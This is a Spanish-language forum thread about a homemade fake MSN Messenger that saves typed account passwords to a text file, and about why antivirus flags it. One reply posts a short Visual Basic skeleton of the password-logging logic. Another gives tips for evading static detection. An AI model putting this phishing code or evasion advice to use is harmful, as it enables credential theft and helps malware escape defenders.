No estoy seguro de si esto debe ir aquí o en seguridad. La cosa es que me aburria y me puse a programa un Fake del Windows Live Messenger para capturar las contraseñas (si, ya se que es un poco lammer, pero me parecía curioso y lo hice como reto personal para ver si conseguía hacerlo, y fue fácil ;D) y el kaspersky me lo detecta como IM-Worm y me gustaría saber que parte del código detecta como tal y por qué lo detecta como virus. ¿Cómo puedo averiguarlo?
Desde ya muchas gracias!
Pues sin ver algo de codigo dificil q lo sepamos xD posilemente se autocopiará en el form load o se añadirá al reg o algo por el estilo.. pones el form load al menos ;)
El problema es que ya no tengo el código porque tuve que formatear y lo perdí, tan solo conservo el ejecutable.
El fake lo hice tomando imágenes del MSN original y lo único que hace es guardar en un archivo de texto lo que se escribe en los cuadros de texto de contraseña y cuenta, abre las páginas que aparecen en la parte de abajo del MSN original si se pulsa sobre ellas y cuando se intenta iniciar sesión muestra un mensaje de error, se cierra y abre el MSN original.
Si hace falta algo mas trataré de reescribir el código y lo pongo, gracias!
jaja perdiste el codigo amigo? :rolleyes:
Así es :xD. Ya se que puede parecer que no he sido yo el que ha creado el Fake, pero que le vamos a hacer :xD. Lo hice bastante chapucero porque apenas sé programar en VB, estoy aprendiendo, y lo que hice fue tomar capturas de cada botón del MSN original por ej: botón iniciar sesión, botón iniciar sesión con el mouse encima (Evento MouseMove) y botón iniciar sesión pulsado (Evento MouseDown) y así con todos :xD.
Puedo volver a escribir el código, pero a parte de que es bastante laborioso por lo de tomar cada imágen y tal (no sé hacerlo aún de otra forma, que supongo que la habrá), no quiero el programa para nada y me parece una pérdida de tiempo.
Respecto al tema principal, lo de por qué es detectada, ¿alguien tiene idea de por qué lo detecta como IM-Worm? ¿Puede ser porque el programa al "iniciar sesión" y saltar el mensaje de error, ejecuta el MSN original?
De nuevo, muchas gracias por vuestra ayuda.
Pues ni idea, por lo q dices q tiene no deberia ser detectado, por q lo unico q haces es guardar el contenido de 2 textbox en un archivo y luego ejecutar otro... eso no deberia ser detectado, a no ser q se lo hayas pasado a MUCHA gente y lo hayan usado mucho y los av's lo hayan detectado..
Tan solo se lo pasé a un amigo para comprobar si funcionaba bien, lo usó unas 5 veces y después lo eliminé. Podría ser ese el motivo, pero lo dudo porque lo usó eso, 5 veces y no lo detecto su AV (Nod32). Además el Nod32 no es el AV que lo detecta, el que lo detecta es el KIS7. ¿Puede ser porque guarda el contenido de un textbox que muestra asteriscos cuando se escribe en él?
EDITO: ¿Subo el programa para que lo veais?
Ahora que lo pienso, ¿es posible que estando en el ordenador de mi amigo algun virus lo haya modificado y por eso ponga lo de IM-Worm?
No, xD mira un ejemplo simple q no es detectado:
Private Sub Command1_Click()
Open "C:\log.txt" For Binary As #1
Put #1, , Text1.Text & Text2.Text
Close #1
msgbox ' El mensaje de error
shell ' Ejecutas el msn
End Sub
Private Sub Form_Load()
Text2.PasswordChar = "*"
End Sub
Ala, eso es todo lo q hay q hacer, si el code es tan simple como eso no te lo deberian detectar ;)
Si no podemos ver el code, pues no vamos a adivinar q le pasa xD
Salu2
IM-Worm significa Instant Messaging (o messenger) Worm, por lo que supongo que el comportamiento de software como el que vos creaste ya ha sido estudiado y clasificado. Es decir, Por ser una accion comun entre estos virus, te la bloquea y reconoce como IM-Worm. Hay mas, pero basicamente es eso.
Aca tenes informacion (ingles): http://www.wormblog.com/im_worms/
Y aca algo mas http://www.viruslist.com/sp/spam/analysis?pubid=189349406
Saludos
Pero, ¿qué propiedad debe tener la aplicación para que sea detectada como IM-Worm?
El fake que yo he hecho no hace nada fuera de lo normal, tan solo guarda el contenido de 2 textbox, abre las páginas de la parte de abajo, ejecuta el MSN original al terminar con su cometido, y tiene un montón de imágenes del MSN para todos los botones :xD.
Lo único que creo que puede hacer que sea detectado es lo de que ejecute el MSN original, ya que no modifica el registro ni hace nada, no se que podrá ser.
¿Cuando lo detecta? ¿Al ejecutar o al scannear? Si es al ejecutar depura el programa y evita que haga ciertas acciones (como ejecutar el msn por ej.).
Yo en su día también hice uno super chapucero con capturas del original. Formateé y cuando reinstalé el antivirus que me puse (no recuerdo cual era) me lo detectaba como MSN Fake. Pero yo supongo que sería por el nombre del archivo.
Cita de: Eternal Idol en 16 Febrero 2008, 21:41 PM
¿Cuando lo detecta? ¿Al ejecutar o al scannear? Si es al ejecutar depura el programa y evita que haga ciertas acciones (como ejecutar el msn por ej.).
Lo detecta simplemente abriendo la carpeta en la que está el programa, no hace falta ni que lo escanee :xD
Cita de: Scratz en 17 Febrero 2008, 00:34 AM
Yo en su día también hice uno super chapucero con capturas del original. Formateé y cuando reinstalé el antivirus que me puse (no recuerdo cual era) me lo detectaba como MSN Fake. Pero yo supongo que sería por el nombre del archivo.
El mío se llama MSNFake.exe y he probado a ponerle otro nombre pero lo detecta igualmente.
Cita de: Gato Negro en 18 Febrero 2008, 16:25 PMLo detecta simplemente abriendo la carpeta en la que está el programa, no hace falta ni que lo escanee :xD
El mío se llama MSNFake.exe y he probado a ponerle otro nombre pero lo detecta igualmente.
Entonces seguramente sea un analisis estatico, puede que tengas dentro las cadenas "fake" y "msn" - en los recursos de version por ejemplo - ;D Trata de
reproducir el programa, agregando de una en una sus funcionalidades hasta que lo detecte ...